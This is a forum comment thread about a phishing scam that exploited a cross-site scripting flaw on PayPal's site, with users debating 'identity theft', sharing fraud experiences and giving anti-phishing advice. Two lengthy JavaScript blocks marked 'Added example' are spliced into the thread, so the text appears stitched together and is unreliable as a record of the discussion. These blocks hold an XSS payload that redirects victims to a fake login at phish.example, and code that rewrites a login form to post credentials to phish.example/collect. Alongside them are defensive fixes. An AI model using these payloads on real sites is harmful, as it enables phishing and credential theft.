PayPal Security Flaw Allows Identity Theft
miller60 writes "Phishing scammers are actively exploiting a security flaw in the PayPal web site to steal credit card numbers belonging to PayPal users. The scam tricks users into accessing a URL hosted on the genuine PayPal site, which presents a valid 256-bit SSL certificate confirming that the site belongs to PayPal. However, some of the content on the page has been modified by the fraudsters via a cross-site scripting technique, and victims are redirected to a spoof site that requests their account details."
What most people don't realize is this, if your card number is stolen and someone uses it.. you aren't liable for the charge.
Unless a merchant has proof that you made the transaction on your credit card, you can always refute any charge on your credit card statement and you won't have to pay it.
MABASPLOOM!
I'm really tired of hearing this term. Nobody's identity is being physically stolen; therefore it is not theft. Please reference a SINGLE case when a "victim" woke up to find that he/she NO LONGER HAD AN IDENTITY!! It's even more absurd than arguing that copyright infringement is theft!
It really grinds my gears when industry lobbyists and shills use inflammatory rhetoric to exaggerate the impact of mundane, victimless crimes.
"Ask not what your country can do for you." --John F. Kennedy
How in the heck did they forge a 256 bit SSL certificate?!
Can't this just be revoked or traced back to the owner?
Please to be 'splainin', Luuuucyyy...
... Oh my God! How will the masses be able to buy gold for World of Warcraft? Something has to be done... GonzoTech
"Snatching defeat from the mouth of victory on a daily basis."
When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, which presents a fake PayPal Member log-In page. At this crucial point, the victim may be off guard, as the paypal.com domain name and SSL certificate he saw previously are likely to make him realise he has visited the genuine PayPal web site - and why would he expect PayPal to redirect him to a fraudulent web site?
What will they think of next? I must say, I get more PayPal phishing emails than for anything else. With the profusion of them, and PayPal's constant warnings that they would never ask for such information, it's still amazing how many people will fall for this, especially as the spoofs get more slick and sophisticated.
GetOuttaMySpace - The Anti-Social Network
"by tricking users into accessing a URL hosted on the genuine PayPal web site" How are hackers injecting this code into a legitimate paypal website?? Don't you have to modify the source code on the paypal servers themselves?
Bored?
Of course, if you've been silly enough to use a debit card, you're out the money for six months or however long it takes until the bank gets around to deciding that you didn't really spend the money. Happened to Tom Tomorrow.
Laws do not persuade just because they threaten. --Seneca
You're right; it's not identity theft, it's identity fraud. Which, guess what, has its victims.
Is this some sort of natural outgrowth of MP3 downloading and software piracy? What are we going to pretend is "victimless" next?
Laws do not persuade just because they threaten. --Seneca
This extremely detailed and thorough (~3 paragraphs long) article does sound like PayPal has a problem to take care of, but the flaw described doesn't remove the burden of stupidity from the phishing equation.
... sorry, I just live in a college town where the newspapers report bank fraud once a month because some stupid student fell for the 23 emails they received about suspicious activity concerning their bank account. Annoying.
Anybody can make a website look like another website, so it's up to a user to think. Get an email that doesn't make any sense? Think very hard about everything that it leads you to. PayPal asks for your ATM PIN? Who the fuck does that? Nobody. My bank doesn't even know what my PIN is.
The server currently running the scam is hosted in Korea
North? South?
As I post this, 6 out of 8 top level posts have a '?' in the subject,
now 7 out of 9.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
I don't know how this is a surprise to anyone. "Cross-site scripting techniques" are so common now that they're writing magazine articles about them. Go look at the last 2600 and you will find out how to do it, and that you can start with myspace.com.
TheADDkid.com
"Is this some sort of natural outgrowth of MP3 downloading and software piracy? What are we going to pretend is "victimless" next?"
AFAIK, at least one psychopath has already argued that raping children is a victimless crime. It should be pretty hard to beat that, but I have no doubt that someone will try to.
Anyway, it's nothing new. The software pirates certainly didn't start it, they just found a niche where it's easier to convince someone that since a copy of the original was made, nothing had really been lost. But, as you can see, it doesn't prevent people from claiming the exact same when some demonstrable harm _did_ get done. (E.g., money from someone's account isn't duplicated; it actually disappears from person A to enter the possession of person B.)
And honestly seeing some of the arguments made, I can't help notice a common theme of handwaving someone else's loss, time, suffering, even pain, as unimportant and not enough to make anyone a victim or to make the act a crime. In effect, the gross disregard for other people. It's beyond individualism, and outright in the realm of sociopathy.
A polar bear is a cartesian bear after a coordinate transform.
Sorry, but if you are dumb enough to still fall for the "Update your account" email then you deserve to have your identity stolen.
This just in! 3 out of 4 people make up 75% of the population.
Never follow a link in an email.
It may be convenient, but in the vast majority of cases I've found that I can navigate from the main page if I know what I'm looking for. You can do basically everything from paypal.com without following the link that takes you directly to a specific page.
I rarely use paypal, checked my bank statement one day, and realized 2k was missing from my bank courtesy of paypal. I have never clicked on a paypal email, and so the only explanation I could think of is either gross incompetence at paypal, or a keylogger was on my system (which was doubtful). Of course, I run all the major spyware/adware/virus/rootkit detectors and nothing (and yes, I do have a firewall, do not use wireless on this computer, and have a good password).
So, no more paypal for me. Of course I eventually got my money back, but it was a major hassle. From now on I am creating accounts using temp credit card numbers.
This shouldn't really be a problem. It only occurs if you click on a link in the e-mail. If you ignore the link in the e-mail, go to PayPal through a bookmark of your own and proceed from there, the phisher can't inject any code. End of problem. And if what the e-mail's asking for is legitimate, you'll be able to do anything you need to do directly through PayPal without needing to use any links in the e-mail.
First rule: never trust the identity of the other party if you didn't initiate the contact yourself. When someone calls you on the phone claiming to be your bank you don't trust them, you hang up and call your bank's customer-service number yourself. When someone sends you an e-mail claiming a link will take you to PayPal you don't trust that, you fire up your browser and use your own bookmark to hit PayPal.
You are right that 'identity theft' is a misleading and incorrect term. However, most people will just tell you 'I could care less.'
However, you are wrong that it is a victimless crime.
For example, if I use your Slashdot username to post troll comments under your name, it will negatively affect your karma, and not mine. Same thing applies with other forms of using someone else's identity, except instead of karma, think 'credit history', 'bank account' or 'criminal record'.
I'll probably be modded down for this...
- PayPal will always include your full name in any e-mail correspondence, not "Dear PayPal Member/User/etc."
- PayPal tells you never to click on a link to log in to their site. They say always type the url: https://www.paypal.com/
Additionally, you should report all spoof e-mails to spoof@paypal.com. Hopefully PayPal will be able to track these online criminals down with the help of users.
Taking guns away from the 99% gives the 1% 100% of the power.
http://www.cgisecurity.com/articles/xss-faq.shtml
Believe me, if I started murdering people, there would be none of you left.
Um, where in the article did it say it was another email scam? Oh wait, it didn't. It has nothing to do with email; it has to do with "They are presented with a message that has been 'injected' onto the genuine PayPal site" "via a cross-site scripting technique." It has nothing to do with email. RTFA
TheADDkid.com
I've been working on this for years now...decades actually....but now I'm totally protected from people stealing my identity and ruining my credit. Here's how I did it:
I've personally destroyed my credit so badly over the years that if someone were to steal my identity, the joke would be on them! Hell, it may actually even help my credit.
Oh sure, people laughed at me over the years...but who's laughing now?!! Ok....so they're still laughing at me...but that's beside the point.
"Leo Fender was in a 'state of grace' when he designed the Stratocaster." -- Paul Reed Smith
I hardly ever use it and PayPal is too big a target with too poor security, and almost nonexistent procedures for recovery after fraud.
MO take 6 months to clear, are trivial to forge, and impossible to verify ahead of time. They bite even worse than Western Union for buyers.
When you commit copy-theft against a song, it makes the artistic owner of that song sad, and you can hear the sadness in their songs. Studies show that you can also hear the sadness in the original copy. The song didn't actually change of course, but it sounds sadder, because of all the crimes committed against it.
So copythieving does affect your ability to listen to songs.
- RIAA Anti Theft Squad
I'll probably be modded down for this...
I used to have a brokerage debit card. It withdrew funds from my money market account. It was an insane risk to use that card. It would have been a jackpot if thieves got that number. And my financial life would have been in ruins for months.
Since the bubble burst, I don't have to worry about having a lot of money in a money market account.
Paypal's main site (http://www.paypal.com) does *NOT* do a permanent redirect to https://www.paypal.com, so if you hit www.paypal.com you give your paypal login and password in the clear. I've emailed them several times on this and have finally given up, as they don't bother to respond.
So if you can get inbetween Paypal and your target, you don't even need to fool anybody.
The exploit uses the concept of cross-site scripting (XSS, not CSS). XSS can work in some interesting ways to trick users. It's certainly more sophisticated than your typical "www.somerandomsite.com/ebay/login.cgi" phishing schemes you see.
You can read some more about XSS.
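The mechanism this post and the article quote above describe, reduced to a runnable sketch. This is an added example, not code from the Netcraft article, from PayPal, or from anyone in the thread: a page on the genuine domain reflects a URL parameter into its HTML without encoding, so the certificate is real but the visible text and the redirect belong to the attacker. The parameter handling, page template, notice wording and the phish.example host are assumptions made for the demo; the hardened renderer shows the usual fix (output encoding), and the last helper is the check a cautious user applies: an https page with a valid certificate says who served the page, not where it is about to send you.

```javascript
// Added example (not from the article or the thread). Models a reflected XSS
// on a trusted domain and the output-encoding fix. Everything here is
// constructed for illustration: parameter, template, message, hostnames.

// Vulnerable rendering: the URL parameter value is dropped into the page as-is.
function renderNoticeVulnerable(msg) {
  return '<html><body><div id="notice">' + msg + '</div></body></html>';
}

// Hardened rendering: encode the characters that can change HTML context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderNoticeSafe(msg) {
  return '<html><body><div id="notice">' + escapeHtml(msg) + '</div></body></html>';
}

// Hypothetical payload in the shape the article describes: overwrite the
// notice text, pause, then send the browser to an off-site login page.
// phish.example is a placeholder, not a real site.
const PAYLOAD =
  '<script>' +
  "document.getElementById('notice').textContent=" +
  "'Your account is currently disabled. You will now be redirected to Resolution Center.';" +
  "setTimeout(function(){location.href='https://phish.example/login';},3000);" +
  '</script>';

// Reviewer/scanner check: did the reflected value survive as live markup?
function reflectsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

// User-side check: any navigation off the origin you logged in to is a
// phishing signal, whatever certificate the previous page showed.
function redirectLeavesOrigin(targetHref, expectedOrigin) {
  return new URL(targetHref).origin !== expectedOrigin;
}

function demo() {
  return {
    vulnerableReflects: reflectsLiveScript(renderNoticeVulnerable(PAYLOAD)), // true
    safeReflects: reflectsLiveScript(renderNoticeSafe(PAYLOAD)),             // false
    offSite: redirectLeavesOrigin('https://phish.example/login', 'https://www.paypal.com'), // true
  };
}

console.log(JSON.stringify(demo()));
```

The point the demo makes for the "how did they forge a certificate?" posts: nobody forged anything. The script runs inside a page that PayPal really served over TLS; the fix is on the server (encode untrusted input before it reaches HTML), not in the certificate.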
Korea is commie either side, only on one side they die in the streets and maybe get a once-over look, and on the other side, no one looks at all.
A few weeks ago, I would have agreed with you. More recently, I've been doing some research and found that only rarely are there obvious 'tells' like asking for a PIN.
You see, in addition to making it look exactly like the vendor's site, they now no longer ask for anything unusual. You click on the link, and are presented with the standard, expected login page. You log in, and everything works just like normal. What really happens is that you log into their server, they capture your information, and redirect the login to the actual vendor. You never receive a hint that you were duped until the charges start showing up.
These days, a suspicious URL in your browser is often the only clue you'll get -- and if you don't have the latest patches for the popular browsers, the URL can be disguised.
This isn't to say that there is no stupidity factor. People still fall for the old style phishing scams like you described, or "validate your credit card number" scams with startling regularity. Most people fail to realize that a simple precaution can make you essentially immune to phishing attempts (like disabling HTML in emails).
However, the newest round of phishing is a lot more sophisticated, and a lot more convincing. As it becomes more prevalent, expect mass stupidity to be less of a factor in its success.
Never. If it's important, you can go to PayPal's website manually, through a different tab or browser window, and check for yourself.
If the email doesn't give you instructions on how to NAVIGATE to a section of their webpage then don't follow the link. No matter how smart we all think we are, we can be tricked. The best thing to do is always start from the company's main page, then browse from there. That way if anything happens, you can blame it on their site.
That's what I tell my wife, who gets lots of phishing emails, and it seems to work. It doesn't matter if your bank says they're going to shutdown your account, if they can't take the time to call you personally, have you call them personally, have you visit personally, or tell you how to navigate to a portion of their site then it isn't that important.
I tell people the same thing with scam emails that purport to be from the police/FBI/etc. I figure if the authorities really need to get a hold of me they can to do it in person.
Faith is a willingness to accept something w/o complete proof and to act on it. Reason allows you to correct that faith.
it's a feature.
Seriously, it is. Look it up. It's unfortunate that the programmers down at PayPal don't have enough wisdom, foresight, and intuition to see that it could be used in such a way.
inject.
I got took for a paycheck's worth, with no high tech used or needed.
Someone hand copied all the info on my car, front and back, when it was used at a restaurant.
I called the bank (Fleet, often considered big and difficult), they looked at everything that happened, I told them which ones were bogus, their fraud department confirmed the details of the transactions (location, times, names; these people were dumb enough to charge at Woolworths overseas, and paid bills for Progressive insurance, ATT and Verizon cells and Cablevision, all eminently traceable).
They reversed the charges, and said they were still subject to verification, and since they were all as I presented them. I got it all back and kept it. Most of the money was back after the next overnight, the rest was back after two overnights.
"Win treats sysadmins better than users. Mac treats users better than sysadmins. Linux treats everyone like sysadmins."
..if the user is savvy enough to know about SSL certificates and URLs you'd think he'd be smart enough NOT to click a link sent to him via email.
by sending the full headers and links to spoof@paypal.com
-- Tigger warning: This post may contain tiggers! --
There is no reason for them to make the home page https - they probably serve millions of visits to this page daily, why serve all the people who just want to read about Paypal or check the help section using SSL and waste processing power?
The login form submits using POST over SSL - the action of the form is using an https target. Your browser therefore sends all your details securely:
<form method="post" name="login_form" action="https://www.paypal.com/
In other words, it's no wonder they haven't fixed it - nothing is broken.
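The two posts above disagree about whether an http home page with an https form action is "broken". Here is an added example, not code from the thread or from PayPal, that models the disagreement: the login form is only as trustworthy as the page that carried it, because anyone on the network path can rewrite an unencrypted page before the browser sees it, and the browser has nothing to verify against. Hostnames, paths and markup are constructed for the demo; the last function is the server-side fix the earlier poster asked for (a permanent redirect from http to https so the form is never served in the clear).

```javascript
// Added example (not from the thread or PayPal). Constructed page as a site
// might serve it over plain http://www.bank.example/ with an https form action.
const HTTP_SERVED_PAGE =
  '<html><body>' +
  '<form method="post" name="login_form" action="https://www.bank.example/login">' +
  '<input name="login_email"><input name="login_password" type="password">' +
  '</form></body></html>';

// What an on-path attacker can do to an unencrypted page in transit: repoint
// the form. The browser cannot notice; it simply receives different bytes
// from the ones the server sent. phish.example is a placeholder.
function onPathRewrite(html, attackerAction) {
  return html.replace(/action="https:\/\/[^"]*"/g, 'action="' + attackerAction + '"');
}

// Extract the form action so a checker (or a careful user) can compare it
// against the page origin before typing a password.
function formAction(html) {
  const m = html.match(/<form[^>]*\saction="([^"]*)"/i);
  return m ? m[1] : null;
}

// What the browser can actually rely on: the scheme of the page the form
// lives on. An https action inside an http page guarantees nothing.
function formActionIsVerifiable(pageUrl) {
  return new URL(pageUrl).protocol === 'https:';
}

// The fix: answer every http request with a 301 to the https URL and never
// serve the form over http. Modelled as a pure function over the request URL.
function respondTo(requestUrl) {
  const u = new URL(requestUrl);
  if (u.protocol === 'http:') {
    u.protocol = 'https:';
    return { status: 301, headers: { Location: u.toString() }, body: '' };
  }
  return { status: 200, headers: {}, body: HTTP_SERVED_PAGE };
}

function demo() {
  const tampered = onPathRewrite(HTTP_SERVED_PAGE, 'http://phish.example/collect');
  return {
    originalAction: formAction(HTTP_SERVED_PAGE),      // https://www.bank.example/login
    tamperedAction: formAction(tampered),              // http://phish.example/collect
    trustworthyOverHttp: formActionIsVerifiable('http://www.bank.example/'),   // false
    trustworthyOverHttps: formActionIsVerifiable('https://www.bank.example/'), // true
    redirect: respondTo('http://www.bank.example/').headers.Location,          // https://www.bank.example/
  };
}

console.log(JSON.stringify(demo()));
```

The "POST over SSL is secure" argument holds only against a passive sniffer. Against anyone who can modify the http response (the "in between" case raised above), the https action is just text the attacker chose not to change yet.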
It's important to educate oneself about basic security. Don't click a link in any email that refers to PayPal. As a matter of fact, there are few reasons to click links in any emails.
Just as important, seriously, educate others. Don't mumble "Darwin" or "figure it out yourself" when you can help someone else protect themselves or educate themselves about security threats.
Always report PayPal phish attempts to spam@paypal.com.
There's an excellent set of resources about phishing in general - and you can report phishing attempts at: antiphishing.org.
Not to be repetitive, but the best way to make a difference (in this case) is to help others and help yourself with education.
A Passionate Independent Musician
I meant to say spoof@paypal.com.
Sorry, I must have been hit with the stupid stick today.
A Passionate Independent Musician
If you get a message from any organization you deal with online, your bank, eBay, even your free webmail account, do NOT click on the link. Go to their site and log in as you normally do. Why? Well, because if they need something, the site will let you know as soon as you log in. There's no possibility for any kind of redirection attack since you actually went to the site properly.
in their attempt to break into the on-line payments business?
I recently (re)opened an account to buy a pinball machine on eBay (Stern Stars, a cool old machine), but it is only tied to my credit card. I'm very familiar (through personal experience) with PayPal's inability to handle fraud (the reason I closed my original, bank-linked account) and their lose-lose-win schemes (on a contested purchase, the buyer loses their money, the seller loses the item, and PayPal gets the big win by keeping any contested funds). I would probably have closed the account again, but my wife wanted to purchase some baby paraphernalia from a home-based business that only accepts checks or PayPal. I'm thinking this article is a reminder to close my PayPal account.
Frankly, I will be very, very happy once Google's tool is available and I have a viable on-line payments alternative to PayPal.
Interested in a Flash-based MAME front end? Visit mame.danzbb.com
There's nothing like the feeling of NOT getting a credit card bill once a month, except not having a car payment to make, or a mortgage payment to make either. (I 'lucked out' despite having MS.)
:-)
I have ONE credit card left and that gets used judiciously. It's also a pay by phone type deal with security identification.
I have no credit rating because I don't WANT any (and I can afford NOT to have any).
You wouldn't believe the number of CapitalOne offers that I've put through the shredder over the years.
When I was young, broke but promising, I could have used the credit. But I didn't have any.
Now that I'm an old fart, I'm stumbling over piles of credit card and 'mortgage renewal' offers.
Well they can all go fuck themselves.
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
an 'upgrade'?
What the heck is wrong with you?
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
It displays the actual content of the link as a pop-up.
I then copy the link into a browser window but not the URL portion. I usually have NW-tools.com up on my browser and use that to check the origin of the message.
I do that with all the phony 'meds' spam I get too.
People have to be really STOOP-ID to click on a link on an email.
I don't even do that with mail purporting to be from people I know.
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
I agree about stupidity still being necessary; the headline made it sound like PayPal itself had been hacked & compromised without user interaction. This belongs in the Phish bucket.
Sure, a site can adopt practices to make itself more resistant to cross site scripting, frame injection, etc., but this isn't anything new, and for the foreseeable future, there will continue to be browser flaws that the targeted site can do nothing about.
A preponderance of users will always be stupid. I don't see this kind of thing going away unless someone develops an ultra-hardened alternative browser, and it then became ubiquitous, i.e. a large majority of people never access sites with high-value PII any other way.
At a minimum, a browser for this purpose would have to be single instance, no tabs, no background windows, non-invokable from externally clicked hyperlinks, and resistant to programmatic instantiation. It would have to encrypt all cached data, and only submit requests to domains that were explicitly pre-authorized by the user -- with an IP check on the associated netblock & whois info at the time of the request.
For obvious reasons, this couldn't be a general-purpose browser. But financial services providers might stand to gain from a collaborative effort to commission such a browser & then *strongly* encourage (read: coerce) users into adopting it for sites with high-value private information.
Pi Ran Out
OK, I am stupid. If the "hackers" can present a legit SSL certificate, what good is it? The whole point (at least my dumb ass thought) of an SSL certificate was to provide assurance that you are dealing with a legit vendor. I thought the exact domain name was encoded with the URL so that an SSL certificate could not be used with a bogus URL? Is it just that these hackers used a valid sub-page off PayPal's website?
Bottom line, what does one do to prevent this as a web host and what does one look for (aside from the obvious: be wary of the website asking you about your personal info) to know it's a scam?
The Netcraft anti-phishing Toolbar already protects PayPal users by blocking access to this site. IE and firefox users can download the toolbar as an extension to the browser and install it.
http://toolbar.netcraft.com/
l'Homme n'est Rien l'Oeuvre Tout: Gustave Flaubert to George Sand
Be careful using a Temp. Credit Card Numbers. Some of them aren't temporary at all, just "sticky". For instance, Discover Card's number generator's numbers are good until the expiration date at the first vendor that uses it. So it's not much good for protecting your paypal account if someone steals it from paypal and uses it in another paypal account.
I guess Netcraft has confirmed then, that PayPal is dying.
Next expect scammers to use Skype to phone you for your password, PayPal to empty your bank account, and eBay to sell the goods they steal from you. eBay is offering crooks one stop shopping to rip you off.
Oh You POS
http://slashdot.org/comments.pl?sid=188468&cid=15535469
...
Wanna fight ? Bend over, stick your head up your ass, and fight for air.
...why it is that whenever I log into PayPal, the number of PayPal-phishing e-mails suddenly increases over the next few minutes? It's as if something is monitoring traffic destined for PayPal (a compromised router, perhaps?) and is automatically triggering phishing e-mails to the originating IP.
Has anyone else seen this?
--Rob
Towards the Singularity.
If I see anything notifying me of an account issue, if it looks like it could be legit, I go directly to the site by typing in the URL.
If there is a real account issue, and it's a company worth doing business with, I'll be able to find out how to resolve it without clicking on any external links to get there.
Now, if they have a way to crack into PayPal's website and insert the dangerous link... that's a problem
Maybe both.
"No fear. No envy. No meanness." Liam Clancy
Old joke:
... wait for it ...
Someone stole all my credit cards but I've decided not to report it yet.
So far the thief is spending less than my wife.
They get the script injection by clicking on a malformed URL.
What would be the best way to get a whole assload of malformed URLs out?
Maybe email spams? Wow, what convoluted logic.
Mod parent (-1, Needs His Ritalin)
Even Wells Fargo and Yahoo have stopped doing this. They used to host http to https form login, but stopped because that's obviously not secure enough due to the lack of site certificate verification, and that "transit" step where somebody could have injected something.
I personally don't like the feeling that it could have been sniffed over the wire, although technically it shouldn't be possible with a POST to https.
What? Are they sending out excel spreadsheets to their users?
----- I have bad karma for a reason! -----
This is not new. Legitimate sites are hacked more often than anyone cares to admit, and end up hosting fraudulent pages that indeed link to an outside page, often with the domain in the web bar masked. Everyone should know by now to go directly to a page, and those who choose to ignore this should either be banned from the internet as their falling for these scams encourages crooks, or else they deserve what they get.
Something else not new is domain masking, which I am sure you all know about.
*sigh* When your ID is stolen, as mine was the "good old-fashioned way" when I was 18 (25 now), it sets you up for years of frustration, thousands you can't recoup, and makes you wonder why the hell people aren't more vigilant about protecting their identity. Once it's lost, you've got no hope, and dozens of police reports are no longer enough to get a new social to get your life back on track. Finding another ding on your report, another credit card in your name, a speeding ticket in a state you've never been to...it all becomes just something you accept, though no less frustrating. And there is no end in sight, not until people wise up and guard themselves to discourage people from even trying. And even that won't be enough.
It's a girl!
Why can't people understand this!?!?!
There is NO identity theft. It is all identity FRAUD. F-R-A-U-D!
It's the same copyright theft vs copyright infringement argument.
Geeze people are retarded.
Libertas in infinitum
Please don't tell me I have to reset my password and re-enter all my credit card information for the fourth time this month!
Right, but my point is that during the dispute process, they have your money. In at least one case (linked to in the original comment), that process took a considerable amount of time. Had it been a credit card, Tom Tomorrow would not have been essentially making a loan of that money to the fraudster.
Laws do not persuade just because they threaten. --Seneca
I suppose a psychopath will say lots of wacky things, but do you know which one this was?
Laws do not persuade just because they threaten. --Seneca
Well, a first for me... they got me. I opened a new paypal account on Monday, and by Wednesday, my credit card was being fleeced. Worst of all, there is no way these guys get caught based on the following actions by the involved entities:

Paypal: Classic, I contacted Paypal on Wednesday, "we have had no security problems.... Don't reply to phishing scams." (no shit sherlock, I just figured I was safe entering information directly into your website using SSL). When elevated up the customer support retard chain, I was then lectured on phishing scams (damn these people are bright), and told to contact my local authorities. Unreal... my local authorities... I wonder how many local reports are taken nationally due to these wankers. Follow up today (Friday), "you should contact our security" [by filling out our webform that warns you incessantly about phishing scams and that tells you after you fill out the form that they will get back to you in about 10 days... nice].

Mastercard: I contacted my credit card company, they cancelled the card but will not investigate until I fill out an affidavit, "which will take about 14 days to arrive."

Kmart: I contacted Kmart, being one of the companies that put through charges to my credit card. "We cannot give you any information without your purchase number" (unreal, my credit card is used for illicit purchases, and I cannot find out where they are shipping the goods). They were nice though, and suggested I fax information to them if I wanted to speak to a security person, and they also suggested I have my local police contact them.

Frederick's of Hollywood: Another company that put charges on my card: "We don't have a security department, call your credit card company." Will someone please shoot that g-string wearing cow.

Local Police: I filled out an online complaint on Wednesday with the financial fraud division of my local police department. Still haven't heard a thing.

I went the extra mile and filed a complaint with the FBI's Internet Crime Complaint Center: Classic moment in law enforcement... after filling out the extensive affidavit, I received a generated email that read in part, "The IC3 receives thousands of complaints each month and does not have the resources to respond to inquiries regarding the status of complaints. It is the IC3's intention to review all complaints and refer them to law enforcement and regulatory agencies having jurisdiction. Ultimately, investigation and prosecution are at the discretion of the receiving agencies." [in other words, we really don't do anything, best of luck old chap]. I wish the crew working this scam the best, they are truly disgusting, but ingenious. As for the entities above, the next time I hear a news report where they are whining about credit card fraud costing consumers and businesses millions, I'll just chuckle at how pathetic the reaction was to my inquiries. They really don't care.

Finally, some have posted that it won't cost me anything.... they are wrong. Some credit cards require the user to pay the first $50 of such fraud. And what about the people who just don't catch the credit card fraudulent uses. If you do not challenge the charge within 90 days, in most cases, you own the debt. Finally, by having my credit card cancelled for fraudulent purposes, I am the lucky recipient of a fraud alert on my credit statements with the credit reporting agencies for at least the next thirty days (I think 60). This means that I am barred from gaining any instant credit during this time period.

Several years ago I had fraud on another credit card (authorities believed that the info was lifted from the card while I was on vacation when I paid for something at a restaurant). I cancelled the card, but a couple weeks later there I was buying $2,000 worth of lumber at home depot for a home project. The clerk says to me, hey if you open up a home depot card, I can discount your purchase by 10%. Hey, I don't need a home depot card, but 200 bucks is nothing to sneeze at. After filling out the form, I was reject
I got a reply from Paypal's security today, basically a form note telling me the horrors of phishing and noting that "the email was not sent by paypal." I sort of wonder if they realize they have this security problem. These people kill me.
From the article:
"... are subsequently presented with another page which requests them to enter further details to remove limits on the access of their account. Information requested includes social security number, credit card number, expiration date, card verification number and ATM PIN."
Now who in their right mind would ever enter their SSN or especially ATM PIN into such a web based form? The only place I have ever been asked to use my ATM PIN online is my bank's login, and I whined and cried to the bank about that. The bank now has a password feature that does not use the ATM PIN which I feel much better with. My main problems with using the ATM PIN as an IP transmitted login password were A: It made my account less secure if my PIN was stolen via a store spycam or similar non IP "over the shoulder" type exploit. B: The PIN length the bank used (4 char) was too short for a decently secure transmitted password. C: Simple separation of risk. D: The only way I could change my PIN and thus IP login was via a bank visit and physical note to a cashier. My bank now allows for an 8-16 character login password that I can change over IP.
Other notes on these issues. I recently backed out of a credit report service signup form because I was uncomfortable with the information they wanted. These credit reporting agencies and the information they want make me nervous. I have used one of the big three a couple of times before and guess I will probably just stick with the expensive services they offer. I ALWAYS do my banking with a single session of Firefox or Mozilla, clear the cache and kill the session when I am done, then start a new instance BEFORE I browse anything else. Of course this is pretty much not possible with Paypal and eBay. However I typically only use the eBay provided "Pay Now" button in "My eBay" instead of one provided by a vendor, even if I have to use their checkout service to process my shipping address and such.
It is unfortunate that it does seem to require more than just "a little common sense" to use such online services safely. To be any kind of safe, it seems one needs to be almost pathologically paranoid. The silver lining, I guess, is that at least part of my sometimes warped psyche might finally work for my benefit.
Matthew
My bank has switched to using website messages because of the spamming emails. I love the ones I get for Chase when I have never had an account with Chase.
Well the smart thing then would be to have an account that doesn't allow overdraft. For all the banks I've dealt with it's an option. In many it's a privilege (e.g. people with bad credit cannot get an overdraft account, as it is a form of credit itself).
Plenty of people I know don't have an overdraft account. Attempt to go $0.01 above what they're holding as a balance and the transaction is rejected.
Some people will never learn:
http://ars.userfriendly.org/cartoons/?id=20030823